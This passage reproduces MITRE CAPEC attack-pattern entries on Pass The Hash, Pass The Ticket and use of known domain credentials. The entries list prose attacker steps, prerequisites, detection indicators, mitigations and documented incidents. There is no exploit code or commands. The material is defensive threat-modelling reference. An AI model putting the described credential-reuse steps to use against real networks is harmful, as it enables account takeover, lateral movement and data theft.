When authenticating via LM or NTLM, an authenticating account's plaintext credentials are not required by the protocols for successful authentication. Instead, the hashed credentials are used to determine if an authentication attempt is valid. If an adversary can obtain an account's hashed credentials, the hash values can then be passed to a system or service to authenticate, without needing to brute-force the hashes to obtain their cleartext values. Successful Pass The Hash attacks result in the adversary fully authenticating as the targeted account, which can further allow the adversary to laterally move within the network, impersonate a legitimate user, and/or download/install malware to systems within the domain. This technique can be performed against any operating system that leverages the LM or NTLM protocols even if the operating system is not Windows-based, since these systems/accounts may still authenticate to a Windows domain.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	653	Use of Known Operating System Credentials
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	165	File Manipulation
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	545	Pull Data from System Resources
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	549	Local Execution of Code

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Acquire known Windows credential hash value pairs: The adversary must obtain known Windows credential hash value pairs of accounts that exist on the domain.

Techniques
An adversary purchases breached Windows credential hash value pairs from the dark web.
An adversary conducts a sniffing attack to steal Windows credential hash value pairs as they are transmitted.
An adversary gains access to a Windows domain system/files and exfiltrates Windows credential hash value pairs.
An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credential hash value pairs.

Experiment

Attempt domain authentication: Try each Windows credential hash value pair until the target grants access.
Techniques
Manually or automatically enter each Windows credential hash value pair through the target's interface.

Exploit

Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain
Spoofing: Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.
Data Exfiltration: The adversary can obtain sensitive data contained within domain systems or applications.

Prerequisites

The system/application is connected to the Windows domain.

The system/application leverages the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.

The adversary possesses known Windows credential hash value pairs that exist on the target domain.

Skills Required

[Level: Low]

Once an adversary obtains a known Windows credential hash value pair, leveraging it is trivial.

Resources Required

A list of known Window credential hash value pairs for the targeted domain.

Indicators

Authentication attempts use credentials that have been used previously by the account in question.

Authentication attempts are originating from IP addresses or locations that are inconsistent with the user's normal IP addresses or locations.

Data is being transferred and/or removed from systems/applications within the network.

Suspicious or Malicious software is downloaded/installed on systems within the domain.

Messages from a legitimate user appear to contain suspicious links or communications not consistent with the user's normal behavior.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authentication	Gain Privileges
Confidentiality Authorization	Read Data
Integrity	Modify Data

Mitigations

Prevent the use of Lan Man and NT Lan Man authentication on severs and apply patch KB2871997 to Windows 7 and higher systems.

Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.

Monitor system and domain logs for abnormal credential access.

Create a strong password policy and ensure that your system enforces this policy.

Leverage system penetration testing and other defense in depth methods to determine vulnerable systems within a domain.

Example Instances

Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credential hash value pairs from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]

Operation Soft Cell, which has been underway since at least 2012, leveraged a modified Mimikatz that dumped NTLM hashes. The acquired hashes were then used to authenticate to other systems within the network via Pass The Hash attacks. [REF-580]

Related Weaknesses

CWE-ID	Weakness Name
522	Insufficiently Protected Credentials
836	Use of Password Hash Instead of Password for Authentication
308	Use of Single-factor Authentication
294	Authentication Bypass by Capture-replay
308	Use of Single-factor Authentication

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1550.002	Use Alternate Authentication Material:Pass The Hash

References

[REF-575] Dan Goodin. "Attackers can use Zoom to steal users’ Windows credentials with no warning". Ars Technica. 2020-04-01. <https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/>. URL validated: 2020-05-07.

[REF-580] Mor Levi, Assaf Dahan and Amit Serper. "Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers". CyberReason. 2019-06-25. <https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers>. URL validated: 2020-05-07.

[REF-581] "Mitigating Pass-the-Hash and Other Credential Theft v2". Microsoft Corporation. <https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN>. URL validated: 2020-05-07.

[REF-582] "How Pass-the-Hash works". Microsoft Corporation. <https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN>. URL validated: 2020-05-07.

[REF-583] Bashar Ewaida. "Pass-the-hash attacks: Tools and Mitigation". The SANS Institute. 2010-02-23. <https://www.sans.org/reading-room/whitepapers/testing/paper/33283>. URL validated: 2020-05-07.

Content History

Submissions
Submission Date	Submitter	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team
2018-07-31 (Version 2.12)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Consequences, Description, Example_Instances, Execution_Flow, Indicators, Likelihood_Of_Attack, Mitigations, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required, Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description

CAPEC-645: Use of Captured Tickets (Pass The Ticket)

Attack Pattern ID: 645

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	652	Use of Known Kerberos Credentials
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Prerequisites

The adversary needs physical access to the victim system.

The use of a third-party credential harvesting tool.

Skills Required

[Level: Low]

Determine if Kerberos authentication is used on the server.

[Level: High]

The adversary uses a third-party tool to obtain the necessary tickets to execute the attack.

Consequences

Scope	Impact	Likelihood
Integrity	Gain Privileges

Mitigations

Reset the built-in KRBTGT account password twice to invalidate the existence of any current Golden Tickets and any tickets derived from them.

Monitor system and domain logs for abnormal access.

Example Instances

Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]

Related Weaknesses

CWE-ID	Weakness Name
522	Insufficiently Protected Credentials
294	Authentication Bypass by Capture-replay
308	Use of Single-factor Authentication

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1550.003	Use Alternate Authentication Material:Pass The Ticket

References

[REF-584] "BRONZE BUTLER Targets Japanese Enterprises". Secureworks® Counter Threat Unit™ Threat Intelligence. 2017-10-12. <https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses>. URL validated: 2020-05-15.

Content History

Submissions
Submission Date	Submitter	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team
2018-07-31 (Version 2.12)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Example_Instances, References, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings

CAPEC-560: Use of Known Domain Credentials

Attack Pattern ID: 560

Abstraction: Meta

View customized information:

Description

Extended Description

Attacks leveraging trusted credentials typically result in the adversary laterally moving within the local network, since users are often allowed to login to systems/applications within the network using the same password. This further allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.

Attacks on known passwords generally rely on the primary fact that users often reuse the same username/password combination for a variety of systems, applications, and services, coupled with poor password policies on the target system or application. Adversaries can also utilize known passwords to target Single Sign On (SSO) or cloud-based applications and services, which often don't verify the authenticity of the user's input. Known credentials are usually obtained by an adversary via a system/application breach and/or by purchasing dumps of credentials on the dark web. These credentials may be further gleaned via exposed configuration and properties files that contain system passwords, database connection strings, and other sensitive data.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	555	Remote Services with Stolen Credentials
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	600	Credential Stuffing
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	652	Use of Known Kerberos Credentials
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	653	Use of Known Operating System Credentials
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	16	Dictionary-based Password Attack
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	49	Password Brute Forcing
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	50	Password Recovery Exploitation
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	55	Rainbow Table Password Cracking
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	70	Try Common or Default Usernames and Passwords
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	204	Lifting Sensitive Data Embedded in Cache
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	508	Shoulder Surfing
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	565	Password Spraying
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	568	Capture Credentials via Keylogger
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	700	Network Boundary Bridging

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

Techniques
An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
An adversary conducts a sniffing attack to steal credentials as they are transmitted.
An adversary gains access to a database and exfiltrates password hashes.
An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.

Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

Techniques
Determine minimum and maximum allowed password lengths.
Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

Attempt authentication: Try each credential until the target grants access.
Techniques
Manually or automatically enter each credential through the target's interface.

Exploit

Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within a system or application
Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.
Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

Prerequisites

The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.

The system/application does not have a sound password policy that is being enforced.

The system/application does not implement an effective password throttling mechanism.

The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target.

Skills Required

[Level: Low]

Once an adversary obtains a known credential, leveraging it is trivial.

Resources Required

A list of known credentials.

A custom script that leverages the credential list to launch an attack.

Indicators

Authentication attempts use credentials that have been used previously by the account in question.

Authentication attempts are originating from IP addresses or locations that are inconsistent with the user's normal IP addresses or locations.

Data is being transferred and/or removed from systems/applications within the network.

Suspicious or Malicious software is downloaded/installed on systems within the domain.

Messages from a legitimate user appear to contain suspicious links or communications not consistent with the user's normal behavior.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authentication	Gain Privileges
Confidentiality Authorization	Read Data
Integrity	Modify Data